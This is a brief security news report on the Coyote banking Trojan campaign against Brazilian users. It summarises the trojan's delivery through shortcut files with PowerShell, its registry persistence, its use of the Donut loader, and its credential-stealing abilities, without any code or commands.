Brazilian users are currently being targeted by a malicious campaign delivering Coyote, a sophisticated banking Trojan. Once installed, Coyote performs various malicious activities, including keylogging and phishing. Fortinet's analysis reveals that the malware is propagated through Windows Shortcut files containing PowerShell commands, which trigger a multi-stage attack chain. First documented by Kaspersky, Coyote can extract information from over 70 financial applications. The malware establishes persistence by modifying the Windows registry, ensuring longevity of its operations on infected machines.
Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials.
The injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads.
Collection
[
|
...
]